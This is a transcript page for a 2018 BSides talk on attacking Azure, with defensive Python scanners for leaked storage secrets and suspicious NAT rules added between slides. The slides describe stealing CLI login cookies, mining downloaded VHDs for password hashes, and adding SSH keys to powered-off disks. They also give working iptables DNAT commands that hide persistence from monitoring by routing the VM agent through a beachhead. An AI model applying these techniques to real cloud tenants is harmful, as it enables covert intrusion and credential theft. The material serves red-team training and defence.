
Blue Cloud of Death: Red Teaming Azure

BSides Nashville Presentation on April 14 2018

On-demand IT services are being publicized as the “new normal”, but oftentimes these services are misunderstood and hence misconfigured by engineers, which frequently enables red teams to gain, expand, and persist access within Azure environments.

In this talk we will dive into how Azure services are commonly breached (e.g. discovering insecure blob storage), and then show how attackers are pivoting between the data & control planes (e.g. mounting hard disks, swapping keys, etc...) to expand access. Finally we will demonstrate some previously unknown techniques for persisting access within Azure environments for prolonged periods of time.

Bryce Kunz (Chief Hacker & President at Stage 2 Security)
Bryce Kunz (@TweekFawkes) loves researching and red teaming bleeding edge IT services. Bryce is currently the Chief Hacker & President at Stage2Sec.com where he released various open source tools (e.g. soMeta, lolrusLove, yupPhrasing, etc…) and has contributed several modules to open source projects (e.g. empire). Previously, Bryce has supported the NSA (network exploitation & vulnerability research), Adobe (built red teaming program for cloud services), and DHS (incident response). Bryce holds numerous certifications (e.g. OSCP, CISSP, ...), and has spoken at various security conferences (i.e. BlackHat, DerbyCon, BSidesLV, etc...).

TweekFawkes

April 14, 2018

Transcript

  1. THE PAST: RED & BLUE. Red Team, Adobe Digital Experience (DX). Bryce Kunz @TweekFawkes. Offense: NSA. Defense: DHS SOC.
  2. THE PRESENT: CYBER SECURITY SERVICES. Stage 2 Security (Red Teaming AWS & Azure Env.) and BSidesSLC (By & For the People). Stage2Sec.com, BSidesSLC.org. Bryce Kunz @TweekFawkes.
  3. TRAINING: AWS & AZURE EXPLOITATION: MAKING THE CLOUD RAIN SHELLS! BlackHat EU (London) SOLD OUT! BlackHat USA (Las Vegas, NV).
  4. CONTROL. (diagram: Azure Cloud with Portal, Admin, Control plane and Data plane) From our vantage point ... mostly just REST APIs ...
  5. SERVICES. (diagram: Azure Cloud with Portal, Admin, Control plane, Data plane, VMs, Storage, Apps, LBs ...) ...too many for any human to care about...
  6. SERVICES. (same diagram as slide 5)
  7. OSINT. (diagram: Hacker on the Internet reaching Collaboration, Repos, CI Pipeline, Dev and Users, which in turn reach the Azure Cloud: Portal, Admin, Control plane, Data plane, VMs, Storage, Apps, LBs)
  8. REPOS. (same diagram as slide 7, Repos highlighted)
  9. BITBUCKET. Find Azure Secrets: Open Source Intel; Code Repositories: BitBucket, GitLab; Gerrit, GitBlit, Git; SVN, etc. (Bryce Kunz - @TweekFawkes)
  10. CI. (same diagram as slide 7, CI Pipeline highlighted)
  11. DEPLOY ACCESS. Find Azure Secrets: Open Source Intel; Code Repositories; Deployment Tools: Puppet, etc.; Jenkins, etc. (Bryce Kunz - @TweekFawkes)
  12. ENDPOINT. (same diagram as slide 7, endpoint highlighted)
  13. HACK & D/L ACCESS. Find Azure Secrets: Open Source Intel; Code Repositories; Deployment Tools; Configuration Files: Classic Hacks, then D/L Secrets. (Bryce Kunz - @TweekFawkes)
  14. MANY ROADS TO PWNAGE. (same diagram as slide 7)
  15. DNS BRUTE FORCE. Storage account names only contain lowercase letters and numbers, and must be between 3 and 24 characters. Candidate count by name length (36 lowercase letters and digits per position) and run time at 100 threads:
       Length   Count         Run Time (100 Threads)
       3        46,656        ~1 min
       4        1,679,616     ~25 min
       5        60,466,176    ~15 hours
       6        ... etc ...   ... etc ...
  16. BRUTE FORCE. Possible, but it kind of sucks to brute force or guess three separate variables/parameters in the URL, e.g. https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt: Storage Account Name: bcodstoragetest005; Container Name: containertest005; Blob Name: test.txt.
  17. LOLRUSLOVE. Spider website for links to Azure blobs; CNAME lookup on FQDNs. (TODO: INSERT Screen Shot; TODO: Demo?)
  18. STORAGE. (same diagram as slide 7, Storage highlighted)
  19. FIND CERT. *.publishsettings, Get-AzurePublishSettingsFile, Management Certificates. A "publish settings file" is an XML file with a .publishsettings file name extension. The file contains an encoded certificate that provides management credentials for your Azure subscriptions.
  20. FIND SECRET. "web.config" (ASP.NET), "app.config" (C#.NET): SAS URI; Connection String; Account Name & Key.
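The secret kinds slides 9 through 13 and slide 20 list (storage connection strings with an account key, SAS URIs sitting in web.config or app.config, and the management certificate inside a .publishsettings file) are exactly what a repository pre-commit hook or CI job should reject before they ever reach a repo or a deployment tool. The scanner below is an added example written for this page, not a tool from the deck or from Stage 2 Security: the regular expressions are heuristics assumed here rather than an Azure specification, and both sample config files are constructed, with placeholder values in place of real credentials.

```python
import re
import sys
from dataclasses import dataclass
from typing import List

# Heuristic patterns for the secret kinds the deck lists (slides 9-13, 20).
# They are assumptions made for this example, not an Azure specification.
PATTERNS = {
    # Storage connection string fragment: ...;AccountName=x;AccountKey=<base64>;...
    "storage_account_key": re.compile(
        r"AccountKey=(?P<secret>[A-Za-z0-9+/]{40,}={0,2})"),
    # Shared Access Signature URI: a URL whose query string carries sig=<signature>
    "sas_uri": re.compile(
        r"https?://[^\s\"'<>]+\?[^\s\"'<>]*\bsig=(?P<secret>[^\s\"'&<>]+)"),
    # Management certificate attribute as it appears in a .publishsettings file
    "management_certificate": re.compile(
        r"ManagementCertificate=\"(?P<secret>[A-Za-z0-9+/=]{20,})\""),
}


@dataclass
class Finding:
    kind: str      # which pattern fired
    line: int      # 1-based line number in the scanned text
    preview: str   # redacted form of the matched secret, safe to log


def redact(secret: str) -> str:
    """Keep only a 4-character prefix so a log of findings is not itself a leak."""
    return f"{secret[:4]}...({len(secret)} chars)"


def scan_text(text: str) -> List[Finding]:
    """Return every pattern hit in `text`, in line order, then pattern order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append(Finding(kind, lineno, redact(match.group("secret"))))
    return findings


def scan_file(path: str) -> List[Finding]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())


# Constructed sample inputs; the key, signature and certificate are placeholders.
SAMPLE_WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="Storage" value="DefaultEndpointsProtocol=https;AccountName=examplestore;AccountKey=CONSTRUCTEDKEYCONSTRUCTEDKEYCONSTRUCTEDKEYCONSTRUCTEDKEY00==;EndpointSuffix=core.windows.net" />
    <add key="ReportsSas" value="https://examplestore.blob.core.windows.net/reports?sv=2017-04-17&amp;sr=c&amp;sig=CONSTRUCTEDsignature%3D" />
    <add key="Theme" value="dark" />
  </appSettings>
</configuration>
"""

SAMPLE_PUBLISHSETTINGS = """<?xml version="1.0" encoding="utf-8"?>
<PublishData>
  <PublishProfile SchemaVersion="2.0" PublishMethod="AzureServiceManagementAPI">
    <Subscription Id="00000000-0000-0000-0000-000000000000" Name="Example" ManagementCertificate="MIICxCONSTRUCTEDBASE64CONSTRUCTEDBASE64CONSTRUCTED" />
  </PublishProfile>
</PublishData>
"""

if __name__ == "__main__":
    # Usage: python3 scan_secrets.py web.config app.config prod.publishsettings
    # With no arguments the constructed samples are scanned instead.
    sources = [(p, scan_file(p)) for p in sys.argv[1:]] or [
        ("sample web.config", scan_text(SAMPLE_WEB_CONFIG)),
        ("sample .publishsettings", scan_text(SAMPLE_PUBLISHSETTINGS)),
    ]
    for name, findings in sources:
        for f in findings:
            print(f"{name}:{f.line}: {f.kind}: {f.preview}")
    # Non-zero exit so a pre-commit hook or CI stage fails when anything is found.
    sys.exit(1 if any(findings for _, findings in sources) else 0)
```

The findings carry only a redacted preview, so the scanner's own output can go into a build log without reproducing the leak it found; the non-zero exit code is what lets it block a commit or a pipeline stage.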
  21. VHDS. Download VHDs: Code Review; Secrets on Disk; Linux: grep for "shadow" hashes.
  22. VHDS. (same content as slide 21)
  23. ENDPOINT. (same diagram as slide 7, endpoint highlighted)
  24. CLI AUTH. "az login" (After logging in, your login token is valid until it goes for 14 days without being used.)
  25. BROWSER COOKIE. "az login" (same token-lifetime note as slide 24)
  26. STEAL COOKIE! "az login" (same token-lifetime note as slide 24)
  27. CLI AUTH. "az login" (same token-lifetime note as slide 24)
  28. DATA -> CONTROL. (diagram: Hacker reaching CI Pipeline, Dev and Users, then VMs inside the Azure Cloud: Portal, Admin, Control plane, Data plane, Storage, Apps, LBs)
  29. AZURE META. Metadata Service: 169.254.169.254. curl http://169.254.169.254/metadata/v1/maintenance; curl http://169.254.169.254/metadata/v1/InstanceInfo (these are mostly useless for hackers...) but useful information is copied into the /var/lib/waagent directory when the instance is created (root access needed): IP address, hostname, subscription ID, resource group name, etc.
  30. CONTROL -> DATA. (same diagram as slide 28)
  31. HARD BOOT. Google: "Reset local Windows password for Azure VM offline" ... Horrible OPSEC but it works: power off a server; mount the server's hard drive using another VM; modify the server for remote access (e.g. add an SSH key to the root user); power the server back on & PROFIT!
  32. STORAGE. (same diagram as slide 7, Storage highlighted)
  33. CONTROL. (same diagram as slide 7, Control highlighted)
  34. SERVICE PRINCIPALS (the recommended approach). Permissions-Restricted Accounts: "az login --service-principal" ... not tied to any particular user ... have permissions on them assigned through pre-defined roles. Multiple Passwords!
  35. START DIGGING. ps auxfww; file; python source code review. Listening Services: netstat -nltpu. Active Connections: netstat -natpu.
  36. PYTHON DEBUGGER (pdb). b: set a breakpoint; c: continue debugging until you hit a breakpoint; s: step through the code; n: go to the next line of code; l: list source code for the current file (default: 11 lines including the line being executed); u: navigate up a stack frame; d: navigate down a stack frame; p: print the value of an expression in the current context.
  37. SYSDIG. sysdig -w 005.scap; systemctl start walinuxagent.service; /usr/bin/python3 -u /usr/sbin/waagent -daemon; sysdig -r 005.scap ... -c topfiles_bytes; -c topprocs_net; -c echo_fds; -c fdbytes_by fd.directory "fd.type=file"; -c fdbytes_by fd.filename "fd.directory=/var/lib/waagent" ...
  38. TASKS. The agent periodically pulls taskings from the HTTP API at http://168.63.129.16 (local Azure fabric address); <Incarnation>2</Incarnation> signals the agent that there are additional tasks. Agent -> Control: GET /machine/?comp=goalstate; Control -> Agent: ... <Incarnation>2</Incarnation> ...
  39. HOST CONFIGS. Pulls hostingEnvironmentConfig. Agent -> Control: GET /machine/ ... type=hostingEnvironmentConfig; Control -> Agent: rd_fabric_stable_dhf5.150807-2320.RuntimePackage_1.0.0.14.zip
  40. EXTENSION CONFIGS. Pulls extension configuration (in this case, the command to run). Agent -> Control: GET /machine/ ... type=extensionsConfig; Control -> Agent: command to run.
  41. CREDS IN REPO. (same diagram as slide 28, with Repos)
  42. VHDS -> CERTS. (same diagram as slide 41)
  43. SUBSCRIPTION. (same diagram as slide 41)
  44. PERSIST? Without getting caught? Bypass: File Integrity Monitoring, so we can't modify files; osquery process list, so we can't be seen in ps; osquery netstat, so we can't be seen in netstat ... ?
  45. BEACHHEAD. (diagram: Hacker; Control at http://168.63.129.16; Beachhead VM 10.0.4.5 running Malware; target VM 10.0.4.4 running the Agent) Ideally: not of high value; not monitored closely. Install our malware to ensure access.
  46. REDIRECT. Redirect the Agent via iptables (target VM 10.0.4.4 -> Beachhead 10.0.4.5): iptables -t nat -I OUTPUT -p tcp --dport 80 -d 168.63.129.16 -m comment --comment "totes not evil" -j DNAT --to-destination 10.0.4.5:80. Netstat looks normal! No new procs!
  47. MITM. Pass API requests via mitmproxy (Beachhead 10.0.4.5): iptables -t nat -I OUTPUT -p tcp --dport 80 -d 10.0.4.5 -m comment --comment "totes not evil" -j DNAT --to-destination 168.63.129.16:80.
  48. EXEC. Tasks created within the Azure subscription for the Beachhead (with the MITM software on it) get redirected and executed on the remote target (VM 10.0.4.4) through the pulling process of the Azure endpoint agent.
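Slides 44 through 48 get past file integrity monitoring, process lists and netstat because the only thing that changes on the target is a nat-table DNAT rule: no new file, no new process, no new listening socket. What does change is the host's NAT table, and that is cheap to monitor. The check below is an added example for this page, not code from the deck: it parses iptables-save output and flags nat rules that rewrite traffic addressed to 168.63.129.16 or 169.254.169.254 (the "diverted" case from slide 46) or that forward traffic onward to one of those addresses (the relay rule from slide 47). The sample rule set is constructed and, only to exercise both branches, puts both of the deck's rules on one host, although the deck places them on two.

```python
import shlex
import sys
from typing import Dict, List, Optional, Tuple

# Control-plane addresses every Azure VM talks to (both appear in the deck):
WIRE_SERVER = "168.63.129.16"   # fabric address the agent pulls goal state from (slides 38-40)
METADATA = "169.254.169.254"    # instance metadata service (slide 29)
SENSITIVE = {WIRE_SERVER, METADATA}

Rule = Tuple[Optional[str], List[str]]   # (table name, argv of the -A line)


def parse_iptables_save(text: str) -> List[Rule]:
    """Return (table, argv) for every '-A' rule in iptables-save output."""
    table = None
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("*"):          # e.g. "*nat" opens a table block
            table = line[1:]
        elif line == "COMMIT":            # closes the current table block
            table = None
        elif line.startswith("-A "):
            rules.append((table, shlex.split(line)))  # shlex keeps quoted comments whole
    return rules


def rule_fields(argv: List[str]) -> Dict[str, Optional[str]]:
    """Pick out the chain and the options the check needs from one rule's argv."""
    fields = {"chain": argv[1] if len(argv) > 1 else None,
              "dst": None, "target": None, "to": None, "comment": None}
    for i, tok in enumerate(argv[:-1]):
        nxt = argv[i + 1]
        if tok == "-d":
            fields["dst"] = nxt.split("/")[0]        # drop /32 style masks
        elif tok == "-j":
            fields["target"] = nxt
        elif tok == "--to-destination":
            fields["to"] = nxt
        elif tok == "--comment":
            fields["comment"] = nxt
    return fields


def find_diversions(text: str) -> List[Dict[str, Optional[str]]]:
    """Flag nat rules that rewrite traffic to, or forward traffic on to, a sensitive address."""
    hits = []
    for table, argv in parse_iptables_save(text):
        if table != "nat":
            continue
        f = rule_fields(argv)
        if f["target"] not in ("DNAT", "REDIRECT"):
            continue
        to_ip = f["to"].rsplit(":", 1)[0] if f["to"] else None
        if f["dst"] in SENSITIVE:
            kind = "diverted"     # the agent's traffic no longer reaches the real endpoint
        elif to_ip in SENSITIVE:
            kind = "forwarder"    # this host relays someone else's traffic to the endpoint
        else:
            continue
        hits.append({"kind": kind, "chain": f["chain"], "dst": f["dst"],
                     "to": f["to"], "comment": f["comment"], "rule": " ".join(argv)})
    return hits


# Constructed sample. The deck places the two DNAT rules on different hosts
# (target VM and beachhead); they are combined here only to exercise both branches.
SAMPLE_IPTABLES_SAVE = """# Generated by iptables-save (constructed sample)
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A OUTPUT -d 168.63.129.16/32 -p tcp -m tcp --dport 80 -m comment --comment "totes not evil" -j DNAT --to-destination 10.0.4.5:80
-A OUTPUT -d 10.0.4.5/32 -p tcp -m tcp --dport 80 -m comment --comment "totes not evil" -j DNAT --to-destination 168.63.129.16:80
-A PREROUTING -p tcp -m tcp --dport 8080 -j DNAT --to-destination 172.17.0.2:80
-A POSTROUTING -s 172.17.0.0/16 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

if __name__ == "__main__":
    # Usage on a live host: iptables-save -t nat | python3 check_nat.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_IPTABLES_SAVE
    hits = find_diversions(text)
    for hit in hits:
        print(f"[{hit['kind']}] chain={hit['chain']} dst={hit['dst']} "
              f"to={hit['to']} comment={hit['comment']!r}")
    sys.exit(1 if hits else 0)
```

The rule's comment is reported alongside the hit because it is attacker-chosen text and therefore useful as an indicator on its own. The same view of the NAT table is available through osquery's iptables table, which fits naturally next to the process-list and netstat queries slide 44 mentions, so a scheduled query there closes the gap those two checks leave.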
  49. MITIGATIONS. Single-purpose secrets; limit the access of each secret; create roles and limit the access of each role; you can ACL off secrets to only work from certain IP addresses; log API calls (e.g. CloudTrail); never use root secrets (use them as a break-glass account only); rotate secrets frequently; encrypt secrets within Git and other data stores ...
  50. THANKS! Stage 2 Security (Red Teaming AWS & Azure Env.) and BSidesSLC (By & For the People). Stage2Sec.com, BSidesSLC.org. Bryce Kunz @TweekFawkes. AWS & Azure Exploitation Training @ BlackHat EU (London).